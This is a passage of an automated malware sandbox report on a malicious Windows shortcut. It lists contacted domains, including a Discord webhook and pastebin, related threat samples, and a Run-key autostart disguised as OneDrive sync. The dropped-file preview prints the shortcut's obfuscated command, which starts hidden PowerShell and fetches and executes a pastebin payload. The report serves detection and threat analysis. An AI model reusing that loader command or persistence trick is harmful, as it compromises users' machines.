                                      		unknown
                                      https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1746329088.0000012ACB105000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://discord.com/api/webhooks/128545359042878powershell.exe, 00000004.00000002.1746329088.0000012ACB62B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41F9E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A4C83000.00000004.00000800.00020000.00000000.sdmptrue
                                          		unknown
                                          https://0.discorpowershell.exe, 00000004.00000002.1746329088.0000012ACB73E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41FB1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A4DB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://raw.githubusercontent.compowershell.exe, 00000004.00000002.1746329088.0000012ACB2AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1746329088.0000012ACC578000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41F062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A42F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://contoso.com/powershell.exe, 00000004.00000002.1775607526.0000012ADB098000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1775607526.0000012ADAF55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1775607526.0000012ADB098000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://tinyurl.compowershell.exe, 00000004.00000002.1746329088.0000012ACC167000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1746329088.0000012ACC4DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1746329088.0000012ACB105000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://raw.githubusercontent.compowershell.exe, 00000004.00000002.1746329088.0000012ACB2AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1746329088.0000012ACC578000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41F062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41F033000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A42F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A42C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://raw.githubusercontepowershell.exe, 00000004.00000002.1746329088.0000012ACC578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://aka.ms/pscore68powershell.exe, 00000004.00000002.1746329088.0000012ACAEE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41E589000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41E59D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A37F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A382D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1746329088.0000012ACAEE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41E5C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A37F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://0.discord.com/powershell.exe, 00000004.00000002.1746329088.0000012ACB73E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41FB1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A4DB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://pastebin.compowershell.exe, 00000004.00000002.1746329088.0000012ACC500000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41EFB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41EF9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41EA48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A422D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A3CDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A4248000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://pastebin.compowershell.exe, 00000004.00000002.1746329088.0000012ACB275000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1746329088.0000012ACC4DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41EFA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A4238000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          104.20.3.235
                                                          		pastebin.comUnited States
                                                          		13335CLOUDFLARENETUStrue
                                                          162.159.137.232
                                                          		discord.comUnited States
                                                          		13335CLOUDFLARENETUStrue
                                                          172.67.19.24
                                                          		unknownUnited States
                                                          		13335CLOUDFLARENETUSfalse
                                                          104.18.111.161
                                                          		tinyurl.comUnited States
                                                          		13335CLOUDFLARENETUStrue
                                                          185.199.111.133
                                                          		raw.githubusercontent.comNetherlands
                                                          		54113FASTLYUStrue

                                                          General Information

                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1534106
                                                          Start date and time:2024-10-15 15:52:15 +02:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 5m 58s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:19
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:BeginSync lnk.lnk
                                                          Detection:MAL
                                                          Classification:mal96.troj.evad.winLNK@20/15@5/5
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HCA Information:
                                                          • Successful, ratio: 100%
                                                          • Number of executed functions: 8
                                                          • Number of non-executed functions: 6
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .lnk

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • VT rate limit hit for: BeginSync lnk.lnk

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          09:53:22API Interceptor510x Sleep call for process: powershell.exe modified
                                                          15:53:40AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                          15:53:48AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          104.20.3.235sostener.vbsGet hashmaliciousNjratBrowse
                                                          • pastebin.com/raw/V9y5Q5vv
                                                          SX8OLQP63C.exeGet hashmaliciousVjW0rm, AsyncRAT, RATDispenserBrowse
                                                          • pastebin.com/raw/V9y5Q5vv
                                                          sostener.vbsGet hashmaliciousRemcosBrowse
                                                          • pastebin.com/raw/V9y5Q5vv
                                                          New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                                                          • pastebin.com/raw/NsQ5qTHr
                                                          Invoice-883973938.jsGet hashmaliciousWSHRATBrowse
                                                          • pastebin.com/raw/NsQ5qTHr
                                                          2024 12_59_31 a.m..jsGet hashmaliciousWSHRATBrowse
                                                          • pastebin.com/raw/NsQ5qTHr
                                                          PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                                                          • pastebin.com/raw/NsQ5qTHr
                                                          162.159.137.2320CX5vBE7nr.exeGet hashmaliciousBabadeda, KDOT TOKEN GRABBERBrowse
                                                            SecuriteInfo.com.Trojan.PWS.Stealer.39881.18601.16388.exeGet hashmaliciousUnknownBrowse
                                                              WCA-Cooperative-Agreement.docx.exeGet hashmaliciousBabadeda, Exela Stealer, Python Stealer, Waltuhium GrabberBrowse
                                                                main.bat.bin.batGet hashmaliciousDiscord RatBrowse
                                                                  Bootstrapper V1.19.exeGet hashmaliciousPython Stealer, Empyrean, Discord Token StealerBrowse
                                                                    https://buxb0t.github.io/https-www.instagram.com-reel-CtFCB1_MvyH-Get hashmaliciousHTMLPhisherBrowse
                                                                      http://bafybeid2klgyiphng6ifws5s35aor57wfi3so6koe2w4ggoacn6gqghegm.ipfs.dweb.link/Get hashmaliciousUnknownBrowse
                                                                        SecuriteInfo.com.Win64.Evo-gen.13899.14592.exeGet hashmaliciousUnknownBrowse
                                                                          https://mj.ostep.net/acknowledgementsGet hashmaliciousUnknownBrowse
                                                                            SecuriteInfo.com.Win32.MalwareX-gen.5836.3825.exeGet hashmaliciousUnknownBrowse

                                                                              Domains

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              raw.githubusercontent.comcr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                              • 185.199.108.133
                                                                              na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                              • 185.199.109.133
                                                                              na.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                              • 185.199.108.133
                                                                              oWARzPF1Ms.exeGet hashmaliciousPureLog StealerBrowse
                                                                              • 185.199.108.133
                                                                              oWARzPF1Ms.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                              • 185.199.108.133
                                                                              New PO-RFQ13101.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                              • 185.199.110.133
                                                                              Upit 220062.xlsGet hashmaliciousRemcosBrowse
                                                                              • 185.199.108.133
                                                                              Swift Payment 20241014839374.vbsGet hashmaliciousRemcosBrowse
                                                                              • 185.199.111.133
                                                                              Image_Attachments.xlsGet hashmaliciousRemcosBrowse
                                                                              • 185.199.111.133
                                                                              Purchase Order.jsGet hashmaliciousAgentTeslaBrowse
                                                                              • 185.199.109.133
                                                                              tinyurl.comhttps://tinyurl.com/y9r5fvasGet hashmaliciousUnknownBrowse
                                                                              • 104.17.112.233
                                                                              https://tinyurl.com/5xa2ubd7Get hashmaliciousUnknownBrowse
                                                                              • 104.17.112.233
                                                                              SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dllGet hashmaliciousMetasploitBrowse
                                                                              • 104.17.112.233
                                                                              SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dllGet hashmaliciousMetasploitBrowse
                                                                              • 104.17.112.233
                                                                              SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dllGet hashmaliciousAsyncRAT, XWormBrowse
                                                                              • 104.18.111.161
                                                                              balcao242609.vbsGet hashmaliciousUnknownBrowse
                                                                              • 104.18.111.161
                                                                              https://ibafhfg.r.af.d.sendibt2.com/tr/cl/ei-iIasDUfhajlha_L_PYwmEV0TXG-pmymM0mqP6wJ8jqUBnRevpHf8umV1Cxk0P5A0G7qvQoF39O-oYwRH3RCdSdtx1Y0b_2sg_iXOax_tFc1XZBC3EPtztmZF7qOstNWb2r9nSAsjPU6qj2F8Gg64Ba0d6xBjSEwUcsnsTYaQjAxsh52QvEBY0E7yDJkW8hVMf4Z-UgTv6SrNDoDPMdYdSSvXdtLzPyBKNyGRyOKbA6kM2yCjc-39_2GjmQrGc8IG-6EqDH4Ly9S8KIsAGet hashmaliciousUnknownBrowse
                                                                              • 104.17.112.233
                                                                              http://tinyurl.com/fresn30d39dGet hashmaliciousUnknownBrowse
                                                                              • 104.17.112.233
                                                                              https://tinyurl.com/NDCEuropeGet hashmaliciousUnknownBrowse
                                                                              • 104.18.111.161
                                                                              https://sway.cloud.microsoft/lKpl4nBPezd0EfSeGet hashmaliciousUnknownBrowse
                                                                              • 104.17.112.233
                                                                              discord.comcr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                              • 162.159.138.232
                                                                              Q1KaSJ8Fom.exeGet hashmaliciousUnknownBrowse
                                                                              • 162.159.135.232
                                                                              Q1KaSJ8Fom.exeGet hashmaliciousUnknownBrowse
                                                                              • 162.159.136.232
                                                                              0CX5vBE7nr.exeGet hashmaliciousBabadeda, KDOT TOKEN GRABBERBrowse
                                                                              • 162.159.137.232
                                                                              0CX5vBE7nr.exeGet hashmaliciousBabadeda, KDOT TOKEN GRABBERBrowse
                                                                              • 162.159.136.232
                                                                              cPl7CoJTBx.exeGet hashmaliciousLuna Grabber, Luna LoggerBrowse
                                                                              • 162.159.128.233
                                                                              SecuriteInfo.com.Win64.MalwareX-gen.20317.810.exeGet hashmaliciousUnknownBrowse
                                                                              • 162.159.138.232
                                                                              SecuriteInfo.com.Python.Muldrop.18.50.31694.exeGet hashmaliciousBlank GrabberBrowse
                                                                              • 162.159.138.232
                                                                              SecuriteInfo.com.Trojan.PWS.Stealer.39881.18601.16388.exeGet hashmaliciousUnknownBrowse
                                                                              • 162.159.136.232
                                                                              SecuriteInfo.com.Win64.Evo-gen.30154.6249.exeGet hashmaliciousUnknownBrowse
                                                                              • 162.159.135.232

                                                                              ASNs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              CLOUDFLARENETUScr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                              • 162.159.138.232
                                                                              HqvlYZC7Gf.exeGet hashmaliciousUnknownBrowse
                                                                              • 104.27.206.92
                                                                              https://e.cukurovadermatoloji.org.tr/i/Do-BbkmS8do2SSRbfKAqhcJT8K9iB0m-Get hashmaliciousUnknownBrowse
                                                                              • 162.159.134.42
                                                                              https://mayamabraidsweaveslocs.com/jndnnjnjvnjvdnvdnjnjn.htmlGet hashmaliciousUnknownBrowse
                                                                              • 1.1.1.1
                                                                              ordine.pdfGet hashmaliciousUnknownBrowse
                                                                              • 104.21.90.114
                                                                              ordine.pdfGet hashmaliciousHtmlDropperBrowse
                                                                              • 188.114.96.3
                                                                              order.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                              • 188.114.97.3
                                                                              https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                              • 104.17.25.14
                                                                              Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              ordine.pdfGet hashmaliciousUnknownBrowse
                                                                              • 188.114.96.3
                                                                              CLOUDFLARENETUSsteamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                              • 162.159.138.232
                                                                              cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                              • 162.159.138.232
                                                                              HqvlYZC7Gf.exeGet hashmaliciousUnknownBrowse
                                                                              • 104.27.206.92
                                                                              https://e.cukurovadermatoloji.org.tr/i/Do-BbkmS8do2SSRbfKAqhcJT8K9iB0m-Get hashmaliciousUnknownBrowse
                                                                              • 162.159.134.42
                                                                              https://mayamabraidsweaveslocs.com/jndnnjnjvnjvdnvdnjnjn.htmlGet hashmaliciousUnknownBrowse
                                                                              • 1.1.1.1
                                                                              ordine.pdfGet hashmaliciousUnknownBrowse
                                                                              • 104.21.90.114
                                                                              ordine.pdfGet hashmaliciousHtmlDropperBrowse
                                                                              • 188.114.96.3
                                                                              order.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                              • 188.114.97.3
                                                                              https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                              • 104.17.25.14
                                                                              Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              CLOUDFLARENETUSsteamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                              • 162.159.138.232
                                                                              cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                              • 162.159.138.232
                                                                              HqvlYZC7Gf.exeGet hashmaliciousUnknownBrowse
                                                                              • 104.27.206.92
                                                                              https://e.cukurovadermatoloji.org.tr/i/Do-BbkmS8do2SSRbfKAqhcJT8K9iB0m-Get hashmaliciousUnknownBrowse
                                                                              • 162.159.134.42
                                                                              https://mayamabraidsweaveslocs.com/jndnnjnjvnjvdnvdnjnjn.htmlGet hashmaliciousUnknownBrowse
                                                                              • 1.1.1.1
                                                                              ordine.pdfGet hashmaliciousUnknownBrowse
                                                                              • 104.21.90.114
                                                                              ordine.pdfGet hashmaliciousHtmlDropperBrowse
                                                                              • 188.114.96.3
                                                                              order.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                              • 188.114.97.3
                                                                              https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                              • 104.17.25.14
                                                                              Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 188.114.96.3

                                                                              JA3 Fingerprints

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              3b5074b1b5d032e5620f69f9f700ff0esteamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                              • 104.20.3.235
                                                                              • 162.159.137.232
                                                                              • 172.67.19.24
                                                                              • 185.199.111.133
                                                                              cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                              • 104.20.3.235
                                                                              • 162.159.137.232
                                                                              • 172.67.19.24
                                                                              • 185.199.111.133
                                                                              https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                              • 104.20.3.235
                                                                              • 162.159.137.232
                                                                              • 172.67.19.24
                                                                              • 185.199.111.133
                                                                              na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                              • 104.20.3.235
                                                                              • 162.159.137.232
                                                                              • 172.67.19.24
                                                                              • 185.199.111.133
                                                                              na.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                              • 104.20.3.235
                                                                              • 162.159.137.232
                                                                              • 172.67.19.24
                                                                              • 185.199.111.133
                                                                              LISTA DE COTIZACIONES.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                              • 104.20.3.235
                                                                              • 162.159.137.232
                                                                              • 172.67.19.24
                                                                              • 185.199.111.133
                                                                              https://doc.triadexport.in/sen43906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab9/?top=janice.atkins@faa.govGet hashmaliciousHTMLPhisherBrowse
                                                                              • 104.20.3.235
                                                                              • 162.159.137.232
                                                                              • 172.67.19.24
                                                                              • 185.199.111.133
                                                                              PO-10-15-2024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 104.20.3.235
                                                                              • 162.159.137.232
                                                                              • 172.67.19.24
                                                                              • 185.199.111.133
                                                                              https://landing-cs.mailcomms.io/73C4D162CAD9C4016A99EC5AF537DA57B4F5451828F0865A7DC8EA34ED2492F0Get hashmaliciousUnknownBrowse
                                                                              • 104.20.3.235
                                                                              • 162.159.137.232
                                                                              • 172.67.19.24
                                                                              • 185.199.111.133
                                                                              https://www.filmize.art/azacGet hashmaliciousUnknownBrowse
                                                                              • 104.20.3.235
                                                                              • 162.159.137.232
                                                                              • 172.67.19.24
                                                                              • 185.199.111.133

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

                                                                              C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Archive, ctime=Sat May 7 04:20:03 2022, mtime=Mon Sep 9 22:58:05 2024, atime=Sat May 7 04:20:03 2022, length=69632, window=hidenormalshowminimized
                                                                              Category:dropped
                                                                              Size (bytes):1728
                                                                              Entropy (8bit):4.527272298423835
                                                                              Encrypted:false
                                                                              SSDEEP:24:8MBsCCbRKrzcAJBkr+/4MsPsiqxlD2uxmCnBuG4aVlilzXQaR3+hab/Ia7/OB+/q:8zD6JUUPx2uxFu+LozXv3KabINBY0
                                                                              MD5:724AA21828AD912CB466E3B0A79F478B
                                                                              SHA1:41B80A72CE8C2F1F54C1E595872D7ECD63D637CD
                                                                              SHA-256:D675147502CF2CA50BC4EC9A0D95DED0A5A8861BEC3D24FCD9EDD3F4B5718E70
                                                                              SHA-512:B88218356ABF805B4263B0960DC6D0FBEC47E2135FA74839449CA860F727D54A1014062C9E7DB0652E81C635C8C0C177B47326DADAF3AE34ED058FA085F1E98C
                                                                              Malicious:true
                                                                              Preview:L..................F.... ...|%h..a.........|%h..a..........................E....P.O. .:i.....+00.../C:\...................V.1......Y..0.Windows.@......T,*)Y................................W.i.n.d.o.w.s.....Z.1.....$Yh...System32..B......T,*)Y......L_.....................!.S.y.s.t.e.m.3.2.....f.2......T.* .forfiles.exe..J......T.*)Y.....A...........t..........t..f.o.r.f.i.l.e.s...e.x.e.......V...............4.......U...........`8......Windows.C:\Windows\System32\forfiles.exe..&.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.f.o.r.f.i.l.e.s...e.x.e.../.p. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2. ./.m. .n.o.t.e.p.a.d...e.x.e. ./.c. .".p.o.w.e.r.s.h.e.l.l...e.x.e. .-.c.o.m.m.a.n.d. .p.o.w.e.r.s.h.e.l.l. .-.w.i.n.d.o.w.s.t.y.l.e. .h. .-.c.o.m.m.a.n.d. .'.s.a.l. .f.a.t.b.a.k.e. .c.a.l.c.;.s.a.l. .c.a.l.l.i.t. .i.E.x.;. .s.a.l. .$.e.n.v.:.o.s. .i.W.r.;. .c.a.l.l.i.T.(.W.I.N.D.O.W.S._.N.T. .p.a.s.t.e.b.i.n...c.o.m./.r.a.w./.s.A.0.4.M.w.k.2. .-.u.s.e.b.a.s.i.c.p.a.r.s.i.n.g.).'."..

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):11608
                                                                              Entropy (8bit):4.890472898059848
                                                                              Encrypted:false
                                                                              SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                              MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                              SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                              SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                              SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                              Malicious:false
                                                                              Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):64
                                                                              Entropy (8bit):1.1940658735648508
                                                                              Encrypted:false
                                                                              SSDEEP:3:Nlllulplj:NllU
                                                                              MD5:2371E5E805FFD1BD5C5D8E0E5417D04E
                                                                              SHA1:CA5ECFEFE41E8C2C46F793818AE344F951D9F868
                                                                              SHA-256:D5954B19DEA37AA6A72E8BB9C73ABD2FC61317D77F5AEB0C0BBF12DAAE099280
                                                                              SHA-512:C50F8F69B277CB06C9770C51FCE5E41FDCDD84C1A9162F8E5F7AAC0F339CBE1570226E814917A8C4BD28FCAEDCD00B720E02A4C85D6DC07E0FFBAE2FE4C407CB
                                                                              Malicious:false
                                                                              Preview:@...e...............................[..".............@..........

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1sjyonbc.23q.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ju1z2mh.iwe.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
